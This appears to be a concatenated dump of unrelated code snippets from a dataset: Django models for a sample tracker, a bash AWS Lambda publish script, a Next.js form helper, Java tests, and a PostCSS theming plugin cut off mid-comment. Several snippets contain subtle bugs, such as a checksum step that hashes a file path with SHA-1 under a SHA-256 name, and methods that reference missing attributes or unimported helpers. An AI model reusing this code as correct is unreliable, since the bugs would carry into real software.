text
stringlengths
1
1.05M
from django.contrib.auth.models import User from django.db import models from openfacstrack.apps.core.models import TimeStampedModel # OpenFacsTrack Models # Note: Django will automatically ad a primary key field named id to all # models unless overridden class Patient(TimeStampedModel): patient_id = models.CharField(max_length=10, unique=True) def __str__(self): return "PatientID:" + self.patient_id class PatientMetadataDict(TimeStampedModel): name = models.CharField(max_length=255) description = models.CharField(max_length=255, null=True) notes = models.CharField(max_length=255, null=True, blank=True) def __str__(self): return ", ".join( [ "Metadata Key:" + self.name, "Description:" + self.description, "notes:" + self.notes, ] ) class PatientMetadata(TimeStampedModel): class Meta: unique_together = (("patient", "metadata_key"),) patient = models.ForeignKey(Patient, on_delete=models.CASCADE) metadata_key = models.ForeignKey(PatientMetadataDict, on_delete=models.CASCADE) metadata_value = models.CharField(max_length=255) def __str__(self): return ", ".join( [ "Patient ID:" + self.patient.patient_id, "Metadata Key:" + self.metadata_key.name, "Metadata value:" + self.metadata_value, ] ) def user_directory_path(instance, filename): return "uploads/user_{0}/{1}".format(instance.user.id, filename) class UploadedFile(TimeStampedModel): CONTENT_TYPE = [ ("PANEL_RESULTS", "Panel results"), ("PATIENT_DATA", "Patient data"), ("OTHER", "Other"), ] name = models.CharField(max_length=255) user = models.ForeignKey(User, blank=True, on_delete=models.DO_NOTHING) description = models.CharField(max_length=255) row_number = models.IntegerField(default=0) content = models.FileField(blank=True, upload_to=user_directory_path) valid_syntax = models.BooleanField(default=True) valid_model = models.BooleanField(default=True) notes = models.TextField(blank=True, default=None) content_type = models.CharField(max_length=20, choices=CONTENT_TYPE) def __str__(self): return ", ".join( [ "File name:" + self.name, "Uploaded:" + str(self.created), "Description:" + self.description, ] ) class ValidationEntry(TimeStampedModel): ENTRY_TYPE = [ ("INFO", "INFO"), ("ERROR", "ERROR"), ("WARN", "WARN"), ("FATAL", "FATAL"), ] VALIDATION_TYPE = [("SYNTAX", "SYNTAX"), ("MODEL", "MODEL")] subject_file = models.ForeignKey(UploadedFile, on_delete=models.CASCADE) entry_type = models.CharField(max_length=12, choices=ENTRY_TYPE, default="INFO") validation_type = models.CharField( max_length=12, choices=VALIDATION_TYPE, default="SYNTAX" ) key = models.CharField(max_length=240) value = models.TextField() def __str__(self): return ", ".join( [ "File ID:" + str(self.subject_file.id), "Key:" + str(self.key), "Value:" + str(self.value), ] ) class ProcessedSample(TimeStampedModel): clinical_sample_id = models.CharField(max_length=12, unique=True) patient = models.ForeignKey(Patient, on_delete=models.CASCADE) # This is meant to store the date a physical sample was acquired - not # the date some of it was processed in a panel. That is stored in the # date_values table against the particular panel. date_acquired = models.DateField(blank=True, null=True) biobank_id = models.CharField(max_length=12) n_heparin_tubes = models.IntegerField(blank=True, null=True) n_paxgene_tubes = models.IntegerField(blank=True, null=True) bleed_time = models.TimeField(blank=True, null=True) processed_time = models.TimeField(blank=True, null=True) blood_vol = models.FloatField(blank=True, null=True) lymph_conc_as_MLNmL = models.FloatField(blank=True, null=True) total_lymph = models.FloatField(blank=True, null=True) vol_frozen_mL = models.FloatField(blank=True, null=True) freeze_time = models.TimeField(blank=True, null=True) # This is to store comments about the sample - not about panel results! comments = models.TextField() real_pbmc_frozen_stock_conc_MLNmL = models.FloatField(blank=True, null=True) def __str__(self): return ", ".join( [ "Clinical sample ID:" + self.clinical_sample_id, "Biobank ID:" + self.biobank_id, "Date acquired:" + str(self.date_acquired), ] ) class StoredSample(TimeStampedModel): processed_sample = models.ForeignKey(ProcessedSample, on_delete=models.CASCADE) stored_sample_id = models.CharField(max_length=10, unique=True) location = models.CharField(max_length=255) type_of_stored_material = models.CharField(max_length=255) from_which_tube_type = models.CharField(max_length=255) freezer = models.CharField(max_length=255) box = models.IntegerField() row = models.IntegerField() position = models.IntegerField() comments = models.TextField() def __str__(self): return ", ".join( [ "Clinical sample ID:" + self.processed_sample.clinical_sample_id, "Biobank ID:" + self.processed_sample.biobank_id, "Date acquired:" + self.date_acquired, "Stored Sample ID" + self.stored_sample_id, ] ) class Result(TimeStampedModel): class Meta: unique_together = ( "processed_sample", "panel", "gating_strategy", "data_processing", ) processed_sample = models.ForeignKey(ProcessedSample, on_delete=models.CASCADE) uploaded_file = models.ForeignKey( UploadedFile, on_delete=models.DO_NOTHING, null=True, blank=True ) panel = models.ForeignKey("Panel", on_delete=models.CASCADE) gating_strategy = models.ForeignKey( "GatingStrategy", blank=True, on_delete=models.DO_NOTHING ) data_processing = models.OneToOneField("DataProcessing", on_delete=models.CASCADE) def __str__(self): return ", ".join( [ "Clinical sample ID:" + self.processed_sample.clinical_sample_id, "Panel:" + self.panel.name, "Gating strategy:" + self.gating_strategy.strategy, ] ) class Panel(TimeStampedModel): name = models.CharField(max_length=255) def __str__(self): return "Panel name: " + self.name class PanelMetadata(TimeStampedModel): panel = models.ForeignKey(Panel, on_delete=models.CASCADE) key = models.CharField(max_length=255) value = models.CharField(max_length=255) def __str__(self): return ", ".join(["Panel name:" + self.panel.name, "Metadata:" + self.name]) class Parameter(TimeStampedModel): DATA_TYPE = [ ("PanelNumeric", "Numeric parameter from panel"), ("SampleNumeric", "Numeric metadata from sample"), ("DerivedNumeric", "Numeric derived parameter from panel"), ("Text", "Text"), ("Date", "Date"), ("Derived", "Derived"), ("Other", "Other"), ] panel = models.ForeignKey(Panel, on_delete=models.CASCADE) data_type = models.CharField(max_length=20, choices=DATA_TYPE) internal_name = models.CharField(max_length=255) public_name = models.CharField(max_length=255) display_name = models.CharField(max_length=255) excel_column_name = models.CharField(max_length=255) description = models.TextField() is_reference_parameter = models.BooleanField(blank=True, null=True) gating_hierarchy = models.TextField(unique=True) unit = models.CharField(max_length=255) ancestral_population = models.CharField(max_length=255) population_for_counts = models.CharField(max_length=255) def __str__(self): return ", ".join( [ "Panel name:" + self.panel.name, "Parameter:" + self.display_name, "Type: " + self.data_type, "Internal name:" + self.internal_name, "Excel column name:" + self.excel_column_name, ] ) class DataProcessing(TimeStampedModel): panel = models.ForeignKey(Panel, on_delete=models.CASCADE) fcs_file_name = models.CharField(max_length=255, unique=True) fcs_file_location = models.CharField(max_length=255) is_in_FlowRepository = models.BooleanField(blank=True, null=True) # is_automated_gating_done = models.BooleanField(blank=True, null=True) def __str__(self): return ", ".join( [ "Panel name:" + self.panel.name, "FCS file:" + self.fcs_file_name + "(location: " + self.fcs_file_location + ")", ] ) class NumericValue(TimeStampedModel): class Meta: unique_together = ("result", "parameter") result = models.ForeignKey(Result, on_delete=models.CASCADE) parameter = models.ForeignKey(Parameter, on_delete=models.CASCADE) value = models.FloatField(null=True) def __str__(self): return ", ".join( [ "Clinical sample ID:" + self.result.processed_sample.clinical_sample_id, "Parameter:" + self.parameter.gating_hierarchy, # "Parameter:" + self.parameter.display_name, "Value:" + str(self.value), ] ) class TextValue(TimeStampedModel): class Meta: unique_together = ("result", "parameter") result = models.ForeignKey(Result, on_delete=models.CASCADE) parameter = models.ForeignKey(Parameter, on_delete=models.CASCADE) value = models.TextField(null=True) def __str__(self): return ", ".join( [ "Clinical sample ID:" + self.result.processed_sample.clinical_sample_id, "Parameter:" + self.parameter.display_name, "Value:" + self.value, ] ) class DateValue(TimeStampedModel): class Meta: unique_together = ("result", "parameter") result = models.ForeignKey(Result, on_delete=models.CASCADE) parameter = models.ForeignKey(Parameter, on_delete=models.CASCADE) value = models.DateField(null=True) def __str__(self): return ", ".join( [ "Clinical sample ID:" + self.result.processed_sample.clinical_sample_id, "Parameter:" + self.parameter.display_name, "Value:" + self.value.strftime("%d/%m/%Y"), ] ) class GatingStrategy(TimeStampedModel): strategy = models.CharField(max_length=100)
HIVE_SRV=mysql-ens-var-prod-1-ensadmin pipeline_dir=/hps/nobackup2/production/ensembl/anja/release_95/cat/remapping/ init_pipeline.pl Bio::EnsEMBL::Variation::Pipeline::Remapping::RemappingVariationFeature_conf \ $($HIVE_SRV details hive) \ -pipeline_name remapping_cat \ -pipeline_dir ${pipeline_dir} \ -ensembl_release 95 \ -species cat \
import styled, { createGlobalStyle } from 'styled-components'; export default createGlobalStyle` * { margin: 0; padding: 0; box-sizing: border-box; outline: 0; } html, body, #root, .App { height: 100vh; } body { background: #FFF; color: #000; -webkit-font-smoothing: antialiased; } body, input, button { font-family: 'Roboto Slab', serif; font-size: 16px; } h1, h2, h3, h4, h5, h6, strong { font-weight: 500; } button { cursor: pointer; } .ContentPage { height: auto; display: flex; align-items: stretch; padding: 16px } `; export const Container = styled.div` width: 75%; height: auto; min-height: 100vh; display: flex; flex-direction: column; margin: auto; background: #f7f7f7; box-shadow: 0px 0px 16px rgb(0 0 0 / 20%); @media (max-width: 600px) { width: 100%; } `;
<gh_stars>10-100 package org.allenai.ml.util; import lombok.val; import org.testng.annotations.Test; import java.io.*; import java.util.stream.Stream; import static org.testng.Assert.*; @Test public class IndexerTest { private final static Indexer<String> avengers = Indexer.fromStream(Stream.of("cap", "iron-man", "hulk", "cap")); public void testIndexer() { assertFalse( avengers.isEmpty() ); assertTrue( avengers.size() == 3 ); assertTrue( avengers.indexOf("cap") == 0 ); assertTrue( avengers.lastIndexOf("cap") == 0 ); assertTrue( avengers.get(0).equals("cap") ); assertTrue( avengers.contains("cap") ); assertFalse(avengers.contains("made-up")); Object[] arr = avengers.toArray(); assertEquals( arr, new String[]{"cap", "iron-man", "hulk"} ); assertEquals( avengers, avengers.subList(0, avengers.size()) ); } @Test(expectedExceptions = RuntimeException.class) public void testIndexerThrowsRemove() { Indexer.fromStream(Stream.of("a", "b", "c")).remove(0); } @Test(expectedExceptions = RuntimeException.class) public void testIndexerThrowsAdd() { Indexer.fromStream(Stream.of("a", "b", "c")).add("d"); } public void testSaveLoadRoundtrip() throws IOException { val baos = new ByteArrayOutputStream(3200); val dos = new DataOutputStream(baos); avengers.save(dos); val dis = new DataInputStream(new ByteArrayInputStream(baos.toByteArray())); val otherAvengers = Indexer.load(dis); assertEquals(avengers, otherAvengers); } }
from typing import List, Dict def process_text(text_list: List[str]) -> Dict[str, int]: text_block = ' '.join(text_list) # Concatenate all strings into a single text block words = text_block.split() # Split the text block into individual words word_count = {} # Dictionary to store word counts for word in words: word = word.strip('.,!?;:').lower() # Remove punctuation and convert to lowercase if word: word_count[word] = word_count.get(word, 0) + 1 # Count occurrences of each word return word_count
import random import string def generate_revision_identifier(): length = 11 characters = string.hexdigits[:-6] # Exclude uppercase letters from hexadecimal characters return ''.join(random.choice(characters) for _ in range(length))
import imageio import numpy as np import cv2 def run(basedir, input_path, output_path, model_path, resize_height=288): """Run MonoDepthNN to compute depth maps. Args: basedir (str): The base directory for the input and output paths. input_path (str): The path to the input folder containing the images for which depth maps need to be computed. output_path (str): The path to the output folder where the computed depth maps will be saved. model_path (str): The path to the pre-trained MonoDepthNN model. resize_height (int): The height to which the input images will be resized before processing. Default is 288. Returns: None """ # Load the pre-trained MonoDepthNN model model = load_model(model_path) # Get the list of input image filenames input_files = os.listdir(os.path.join(basedir, input_path)) for file in input_files: # Read the input image input_image = cv2.imread(os.path.join(basedir, input_path, file)) # Resize the input image input_image = cv2.resize(input_image, (int(input_image.shape[1] * resize_height / input_image.shape[0]), resize_height)) # Preprocess the input image for model prediction input_image = preprocess_input(input_image) # Use the MonoDepthNN model to compute the depth map depth_map = model.predict(input_image) # Post-process the depth map if necessary depth_map = postprocess_depth_map(depth_map) # Save the computed depth map to the output folder output_filename = os.path.join(basedir, output_path, file.split('.')[0] + '_depth.png') cv2.imwrite(output_filename, to8b(depth_map)) return None
SELECT * FROM employees WHERE employeeId IN (1, 2, 3);
<reponame>logicbomb12/TextBlackJack<filename>src/Main.java import BJ.*; public class Main { public static void main(String[] args) { Game bj = new Game(); bj.run(); } }
package org.vertx.tests.core.appmanager; import org.testng.annotations.Test; import org.vertx.java.core.Handler; import org.vertx.java.core.SimpleHandler; import org.vertx.java.core.app.AppManager; import org.vertx.java.core.app.AppType; import org.vertx.java.core.app.cli.DeployCommand; import org.vertx.java.core.app.cli.SocketDeployer; import org.vertx.java.core.app.cli.UndeployCommand; import org.vertx.java.core.app.cli.VertxCommand; import org.vertx.java.core.buffer.Buffer; import org.vertx.java.core.http.HttpClient; import org.vertx.java.core.http.HttpClientResponse; import org.vertx.java.core.internal.VertxInternal; import org.vertx.java.core.logging.Logger; import org.vertx.java.core.net.NetClient; import org.vertx.java.core.net.NetSocket; import org.vertx.java.core.parsetools.RecordParser; import org.vertx.tests.core.TestBase; import java.net.URL; import java.util.ArrayList; import java.util.HashSet; import java.util.List; import java.util.Set; import java.util.concurrent.CountDownLatch; import java.util.concurrent.TimeUnit; /** * @author <a href="http://tfox.org"><NAME></a> */ public class AppManagerTest extends TestBase { private static final Logger log = Logger.getLogger(AppManagerTest.class); @Test public void testRequestsDistributedJava() throws Exception { int instances = 4; List<String> results = doTest(AppType.JAVA, "com.acme.someapp.TestApp1", instances, 10); Set<String> set = new HashSet<>(); for (String res: results) { set.add(res); } azzert(set.size() == instances); } @Test public void testIsolationJava() throws Exception { int instances = 4; List<String> results = doTest(AppType.JAVA, "com.acme.someapp.TestApp2", instances, 10); Set<String> set = new HashSet<>(); //Each instance should have its own static counter for (String res: results) { azzert(Integer.parseInt(res) == 1); } } private List<String> doTest(AppType appType, final String main, final int instances, final int requests) throws Exception { AppManager mgr = new AppManager(SocketDeployer.DEFAULT_PORT); mgr.startNoBlock(); Thread.sleep(100); URL url = null; if (appType == AppType.JAVA) { //We need to get the URL to the root directory of where the classes are so we can use that URL //in another classloader to load the classes String classFile = main.replace('.', '/') + ".class"; url = getClass().getClassLoader().getResource(classFile); String surl = url.toString(); String surlroot = surl.substring(0, surl.length() - classFile.length()); url = new URL(surlroot); } // else if (appType == AppType.RUBY) { // url = getClass().getClassLoader().getResource(main); // String surl = url.toString(); // String surlroot = surl.substring(0, surl.length() - main.length()); // url = new URL(surlroot); // log.info("url is " + url); // } final List<String> ret = new ArrayList<>(); final CountDownLatch latch = new CountDownLatch(requests); DeployCommand cmd = new DeployCommand(appType, "myapp", main, new URL[] {url}, instances); sendCommand(cmd); Thread.sleep(200); VertxInternal.instance.go(new Runnable() { public void run() { for (int i = 0; i < requests; i++) { final HttpClient client = new HttpClient(); client.setPort(8080).setHost("localhost").getNow("/", new Handler<HttpClientResponse>() { public void handle(HttpClientResponse response) { final Buffer buff = Buffer.create(0); response.dataHandler(new Handler<Buffer>() { public void handle(Buffer data) { buff.appendBuffer(data); } }); response.endHandler(new SimpleHandler() { public void handle() { String result = buff.toString(); synchronized (ret) { ret.add(result); } client.close(); latch.countDown(); } }); } }); } } }); azzert(latch.await(5, TimeUnit.SECONDS)); sendCommand(new UndeployCommand("myapp")); final CountDownLatch stopLatch = new CountDownLatch(1); mgr.stop(new SimpleHandler() { public void handle() { stopLatch.countDown(); } }); azzert(stopLatch.await(5, TimeUnit.SECONDS)); return ret; } private void sendCommand(final VertxCommand command) throws Exception { final CountDownLatch latch = new CountDownLatch(1); VertxInternal.instance.go(new Runnable() { public void run() { final NetClient client = new NetClient(); client.connect(SocketDeployer.DEFAULT_PORT, "localhost", new Handler<NetSocket>() { public void handle(NetSocket socket) { socket.dataHandler(RecordParser.newDelimited("\n", new Handler<Buffer>() { public void handle(Buffer buff) { String line = buff.toString(); azzert(line.equals("OK")); client.close(); latch.countDown(); } })); command.write(socket, null); } }); } }); azzert(latch.await(5, TimeUnit.SECONDS)); } }
<table> <tr> <th>Name</th> <th>Age</th> <th>Gender</th> </tr> </table>
<filename>src/utils/connextForm.ts async function getFormSubmission(req: any) { return new Promise((resolve) => { if (req.method == "POST") { let body = ""; req.on("data", (chunk: any) => { body += chunk; }); req.on("end", () => { resolve(JSON.parse(body)); }); } else { resolve(false); } }); } async function connextFormSubmit(ev: any) { ev.preventDefault(); const { buildId } = window.__NEXT_DATA__; const page = window.location.pathname; const data_obj = getFormData(ev.target); const data = await fetch(`/_next/data/${buildId}/en${page}.json`, { headers: { "Content-Type": "application/json", }, method: "POST", body: JSON.stringify(data_obj), }); return new Promise((resolve) => { const reader = data.body?.getReader(); let value = ""; reader?.read().then(function processText(data): any { if (data.done) { resolve(JSON.parse(value).pageProps); return; } value += new TextDecoder().decode(data.value); return reader.read().then(processText); }); }); } function getFormData(form: any) { const namedElements = form.querySelectorAll("[name]"); const return_data = {}; namedElements.forEach((elm: any) => { const path = elm.getAttribute("name"); const [name, idx] = getLastProperty(path); const data_object = constructObjectFromPath(return_data, path); const val = getValue(elm); if (idx !== null) { data_object[name] = data_object[name] || []; data_object[name][idx] = val; } else { data_object[name] = val; } }); return return_data; } function constructObjectFromPath(data_obj: any, path: any) { const path_split = path.split("."); path_split.pop(); if (path_split.length === 0) return data_obj; path_split.forEach((prop: any) => { data_obj = tryAddArray(data_obj, prop) || addObject(data_obj, prop); }); return data_obj; } function getLastProperty(path: string): [string, null | number] { const arrPathRegex = /[[\]]/g; const lastProp = path.split(".").at(-1); if (!lastProp) return [path, null]; if (arrPathRegex.test(lastProp)) return getArrayNameAndIndex(lastProp); return [lastProp, null]; } function getArrayNameAndIndex(prop: string): [string, number] { const arrPathRegex = /[[\]]/g; const arr_split = prop.split(arrPathRegex); const propName = arr_split[0]; const index = arr_split[1]; if (arr_split.length > 1 && index) return [propName, parseInt(index)]; throw new Error( `Array Path '${prop}' needs an index. Do not leave [] index empty... must have an integer index, ie: [0]` ); } function tryAddArray(data_obj: any, prop: any) { const arrPathRegex = /[[\]]/g; if (!arrPathRegex.test(prop)) return undefined; const [propName, index] = getArrayNameAndIndex(prop); data_obj[propName] = data_obj[propName] || []; return addObject(data_obj[propName], index); } function addObject(data_obj: any, prop: any) { data_obj[prop] = data_obj[prop] || {}; return data_obj[prop]; } function getValue(elm: any) { if (elm.value) return elm.value; return ""; } export { getFormSubmission, connextFormSubmit };
#!/usr/bin/env bash # A helper tool to assist us maintaining lambda functions # Intention here is to keep this files and all its functions reusable for all Telemetry repositories set -o errexit set -o nounset ##################################################################### ## Beginning of the configurations ################################## BASE_LOCATION="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)" PROJECT_FULL_NAME=$(basename $BASE_LOCATION) PROJECT_NAME=$(echo $PROJECT_FULL_NAME | sed 's/aws-lambda-//') PATH_BUILD="${BASE_LOCATION}/build" PATH_CF_TEMPLATE="${PATH_BUILD}/${PROJECT_NAME}-cf-template.yaml" PATH_SAM_RESOURCES="${BASE_LOCATION}/resources/aws-sam-cli/" S3_TELEMETRY_LAMBDA_ROOT="telemetry-internal-base-lambda-artifacts" S3_LAMBDA_SUB_FOLDER="build-${PROJECT_FULL_NAME}" S3_ADDRESS="s3://${S3_TELEMETRY_LAMBDA_ROOT}/${S3_LAMBDA_SUB_FOLDER}" ## End of the configurations ######################################## ##################################################################### # Prepare dependencies and build the Lambda function code using SAM assemble() { print_begins mkdir -p ${PATH_BUILD} poetry export --without-hashes --format requirements.txt --output ${PATH_BUILD}/requirements.txt SAM_CLI_TELEMETRY=0 poetry run sam build ${SAM_USE_CONTAINER:=""} --template-file ${PATH_SAM_RESOURCES}/template.yaml --manifest ${PATH_BUILD}/requirements.txt --region eu-west-2 print_completed } # Creates a release tag in the repository cut_release() { print_begins poetry run cut-release print_completed } # Bump the function's version when appropriate prepare_release() { print_begins poetry run prepare-release export_version print_completed } # Take all the necessary steps to build and publish both lambda function's zip and checksum files publish() { print_begins assemble publish_artifacts_to_s3 rename_artifacts_in_s3 publish_checksum_file print_completed } # Package and upload artifacts to S3 using poetry installed SAM publish_artifacts_to_s3() { print_begins export_version # Unfortunately Poetry won't allow # us to add awscli to the --dev dependencies due to transitive # dependency conflicts with aws-sam-cli. Until the conflicts are # resolved we have to use pip to install awscli. # Commenting this as I dont see why it is needed here also I expect awscli be installed in the codebuild instance # pip install awscli SAM_CLI_TELEMETRY=0 poetry run sam package --region eu-west-2 \ --s3-bucket ${S3_TELEMETRY_LAMBDA_ROOT} \ --s3-prefix ${S3_LAMBDA_SUB_FOLDER} \ --output-template-file=${PATH_CF_TEMPLATE} print_completed } # Download the artifacts zip file and generate its checksum file to be stored alongside it publish_checksum_file() { print_begins export_version export FILE_NAME="aws-lambda-${PROJECT_NAME}.${VERSION}.zip" export HASH_FILE_NAME="${FILE_NAME}.base64sha256.txt" aws s3 cp ${S3_ADDRESS}/${FILE_NAME} ${PATH_BUILD}/${FILE_NAME} echo -n "${PATH_BUILD}/${FILE_NAME}" | openssl dgst -binary -sha1 | openssl base64 >${PATH_BUILD}/${HASH_FILE_NAME} aws s3 cp ${PATH_BUILD}/${HASH_FILE_NAME} ${S3_ADDRESS}/${HASH_FILE_NAME} \ --content-type text/plain --acl=bucket-owner-full-control print_completed } # Rename SAM generated package to the expected format by terraform, # to be picked up during provisioning of the AWS "Lambda function" resource rename_artifacts_in_s3() { print_begins export_version export S3_KEY_FILENAME=$(grep S3Key ${PATH_CF_TEMPLATE} | cut -d : -f 2 | cut -d / -f 2 | sed 's/\s*//g') # Using mv instead of cp will require updating the codebuild's service-role to grant DeleteObject permission aws s3 mv ${S3_ADDRESS}/${S3_KEY_FILENAME} ${S3_ADDRESS}/aws-lambda-${PROJECT_NAME}.${VERSION}.zip \ --acl=bucket-owner-full-control print_completed } ##################################################################### ## Beginning of the helper methods ################################## export_version() { if [ ! -f ".version" ]; then echo ".version file not found! Have you run prepare_release command?" exit 1 fi export VERSION=$(cat .version) } help() { echo "$0 Provides set of commands to assist you with day-to-day tasks when working in this project" echo echo "Available commands:" echo -e " - assemble\t\t\t Prepare dependencies and build the Lambda function code using SAM" echo -e " - prepare_release\t\t Bump the function's version when appropriate" echo -e " - publish\t\t\t Package and share artifacts by running assemble, publish_artifacts_to_s3, rename_artifacts_in_s3 and publish_checksum_file commands" echo -e " - publish_artifacts_to_s3\t Uses SAM to Package and upload artifacts to ${S3_ADDRESS}" echo -e " - publish_checksum_file\t Generate a checksum for the artifacts zip file and store in the same S3 location (${S3_LAMBDA_SUB_FOLDER})" echo -e " - rename_artifacts_in_s3\t Rename the artifact published by SAM to ${S3_ADDRESS} to expected, versioned file name" echo -e " - cut_release\t\t Creates a release tag in the repository" echo } print_begins() { echo -e "\n-------------------------------------------------" echo -e ">>> ${FUNCNAME[1]} Begins\n" } print_completed() { echo -e "\n### ${FUNCNAME[1]} Completed!" echo -e "-------------------------------------------------" } print_configs() { echo -e "BASE_LOCATION:\t\t\t${BASE_LOCATION}" echo -e "PROJECT_FULL_NAME:\t\t${PROJECT_FULL_NAME}" echo -e "PROJECT_NAME:\t\t\t${PROJECT_NAME}" echo echo -e "PATH_BUILD:\t\t\t${PATH_BUILD}" echo -e "PATH_CF_TEMPLATE:\t\t${PATH_CF_TEMPLATE}" echo -e "PATH_SAM_RESOURCES:\t\t${PATH_SAM_RESOURCES}" echo echo -e "S3_TELEMETRY_LAMBDA_ROOT:\t${S3_TELEMETRY_LAMBDA_ROOT}" echo -e "S3_LAMBDA_SUB_FOLDER:\t\t${S3_LAMBDA_SUB_FOLDER}" echo -e "S3_ADDRESS:\t\t\t${S3_ADDRESS}" } ## End of the helper methods ######################################## ##################################################################### ##################################################################### ## Beginning of the Entry point ##################################### main() { # Validate command arguments [ "$#" -ne 1 ] && help && exit 1 function="$1" functions="help assemble publish_s3 rename_s3_file publish publish_checksum_file prepare_release print_configs cut_release" [[ $functions =~ (^|[[:space:]])"$function"($|[[:space:]]) ]] || (echo -e "\n\"$function\" is not a valid command. Try \"$0 help\" for more details" && exit 2) $function } main "$@" ## End of the Entry point ########################################### #####################################################################
<gh_stars>100-1000 import { minifyJSON } from './helpers/json.util'; import { minifyCSS } from './helpers/css.util'; const postcss = require('postcss'); const fs = require('fs-extra'); const THEMIFY = 'themify'; const JSToSass = require('./helpers/js-sass'); export interface ThemifyOptions { /** * Whether we would like to generate the CSS variables. * This should be true, unless you want to inject them yourself. */ createVars: boolean; /** * Palette configuration */ palette: any; /** * A class prefix to append to the generated themes classes */ classPrefix: string; /** * Whether to generate a fallback for legacy browsers (ahm..ahm..) that do not supports CSS Variables */ screwIE11: boolean; /** * Legacy browser fallback */ fallback: { /** * An absolute path to the fallback CSS. */ cssPath: string | null; /** * An absolute path to the fallback JSON. * This file contains variable that will be replace in runtime, for legacy browsers */ dynamicPath: string | null; }; } const defaultOptions: ThemifyOptions = { createVars: true, palette: {}, classPrefix: '', screwIE11: true, fallback: { cssPath: null, dynamicPath: null } }; /** supported color variations */ const ColorVariation = { DARK: 'dark', LIGHT: 'light' }; function buildOptions(options: ThemifyOptions) { if (!options) { throw new Error(`options is required.`); } // make sure we have a palette if (!options.palette) { throw new Error(`The 'palette' option is required.`); } return { ...defaultOptions, ...options }; } /** * * @param {string} filePath * @param {string} output * @returns {Promise<any>} */ function writeToFile(filePath: string, output: string) { return fs.outputFile(filePath, output); } /** * Get the rgba as 88, 88, 33 instead rgba(88, 88, 33, 1) * @param value */ function getRgbaNumbers(value: string) { return hexToRgba(value) .replace('rgba(', '') .replace(', 1)', ''); } /** Define the default variation */ const defaultVariation = ColorVariation.LIGHT; /** An array of variation values */ const variationValues: string[] = (Object as any).values(ColorVariation); /** An array of all non-default variations */ const nonDefaultVariations: string[] = variationValues.filter(v => v !== defaultVariation); function themify(options: ThemifyOptions) { /** Regex to get the value inside the themify parenthesis */ const themifyRegExp = /themify\(([^)]+)\)/gi; /** * Define the method of color execution */ const enum ExecutionMode { CSS_VAR = 'CSS_VAR', CSS_COLOR = 'CSS_COLOR', DYNAMIC_EXPRESSION = 'DYNAMIC_EXPRESSION' } options = buildOptions(options); return root => { // process fallback CSS, without mutating the rules if (options.screwIE11 === false) { processFallbackRules(root); } // mutate the existing rules processRules(root); }; /** * @example themify({"light": ["primary-0", 0.5], "dark": "primary-700"}) * @example themify({"light": "primary-0", "dark": "primary-700"}) * @example linear-gradient(themify({"color": "primary-200", "opacity": "1"}), themify({"color": "primary-300", "opacity": "1"})) * @example themify({"light": ["primary-100", "1"], "dark": ["primary-100", "1"]}) * @example 1px solid themify({"light": ["primary-200", "1"], "dark": ["primary-200", "1"]}) */ function getThemifyValue(propertyValue: string, execMode: ExecutionMode): { [variation: string]: string } { /** Remove the start and end ticks **/ propertyValue = propertyValue.replace(/'/g, ''); const colorVariations = {}; function normalize(value, variationName) { let parsedValue; try { parsedValue = JSON.parse(value); } catch (ex) { throw new Error(`fail to parse the following expression: ${value}.`); } const currentValue = parsedValue[variationName]; /** For example: background-color: themify((light: primary-100)); */ if (!currentValue) { throw new Error(`${value} has one variation.`); } // convert to array if (!Array.isArray(currentValue)) { // color, alpha parsedValue[variationName] = [currentValue, 1]; } else if (!currentValue.length || !currentValue[0]) { throw new Error('Oops. Received an empty color!'); } if (options.palette) return parsedValue[variationName]; } // iterate through all variations variationValues.forEach(variationName => { // replace all 'themify' tokens with the right string colorVariations[variationName] = propertyValue.replace(themifyRegExp, (occurrence, value) => { // parse and normalize the color const parsedColor = normalize(value, variationName); // convert it to the right format return translateColor(parsedColor, variationName, execMode); }); }); return colorVariations; } /** * Get the underline color, according to the execution mode * @param colorArr two sized array with the color and the alpha * @param variationName the name of the variation. e.g. light / dark * @param execMode */ function translateColor(colorArr: [string, string], variationName: string, execMode: ExecutionMode) { const [colorVar, alpha] = colorArr; // returns the real color representation const underlineColor = options.palette[variationName][colorVar]; if (!underlineColor) { // variable is not mandatory in non-default variations if (variationName !== defaultVariation) { return null; } throw new Error(`The variable name '${colorVar}' doesn't exists in your palette.`); } switch (execMode) { case ExecutionMode.CSS_COLOR: // with default alpha - just returns the color if (alpha === '1') { return underlineColor; } // with custom alpha, convert it to rgba const rgbaColorArr = getRgbaNumbers(underlineColor); return `rgba(${rgbaColorArr}, ${alpha})`; case ExecutionMode.DYNAMIC_EXPRESSION: // returns it in a unique pattern, so it will be easy to replace it in runtime return `%[${variationName}, ${colorVar}, ${alpha}]%`; default: // return an rgba with the CSS variable name return `rgba(var(--${colorVar}), ${alpha})`; } } /** * Walk through all rules, and replace each themify occurrence with the corresponding CSS variable. * @example background-color: themify(primary-300, 0.5) => background-color: rgba(var(--primary-300),0.6) * @param root */ function processRules(root) { root.walkRules(rule => { if (!hasThemify(rule.toString())) { return; } let aggragatedSelectorsMap = {}; let aggragatedSelectors: string[] = []; let createdRules: any[] = []; const variationRules = { [defaultVariation]: rule }; rule.walkDecls(decl => { const propertyValue = decl.value; if (!hasThemify(propertyValue)) return; const property = decl.prop; const variationValueMap = getThemifyValue(propertyValue, ExecutionMode.CSS_VAR); const defaultVariationValue = variationValueMap[defaultVariation]; decl.value = defaultVariationValue; // indicate if we have a global rule, that cannot be nested const createNonDefaultVariationRules = isAtRule(rule); // don't create extra CSS for global rules if (createNonDefaultVariationRules) { return; } // create a new declaration and append it to each rule nonDefaultVariations.forEach(variationName => { const currentValue = variationValueMap[variationName]; // variable for non-default variation is optional if (!currentValue || currentValue === 'null') { return; } // when the declaration is the same as the default variation, // we just need to concatenate our selector to the default rule if (currentValue === defaultVariationValue) { const selector = getSelectorName(rule, variationName); // append the selector once if (!aggragatedSelectorsMap[variationName]) { aggragatedSelectorsMap[variationName] = true; aggragatedSelectors.push(selector); } } else { // creating the rule for the first time if (!variationRules[variationName]) { const clonedRule = createRuleWithVariation(rule, variationName); variationRules[variationName] = clonedRule; // append the new rule to the array, so we can append it later createdRules.push(clonedRule); } const variationDecl = createDecl(property, variationValueMap[variationName]); variationRules[variationName].append(variationDecl); } }); }); if (aggragatedSelectors.length) { rule.selectors = [...rule.selectors, ...aggragatedSelectors]; } // append each created rule if (createdRules.length) { createdRules.forEach(r => root.append(r)); } }); } /** * indicate if we have a global rule, that cannot be nested * @param rule * @return {boolean} */ function isAtRule(rule) { return rule.parent && rule.parent.type === 'atrule'; } /** * Walk through all rules, and generate a CSS fallback for legacy browsers. * Two files shall be created for full compatibility: * 1. A CSS file, contains all the rules with the original color representation. * 2. A 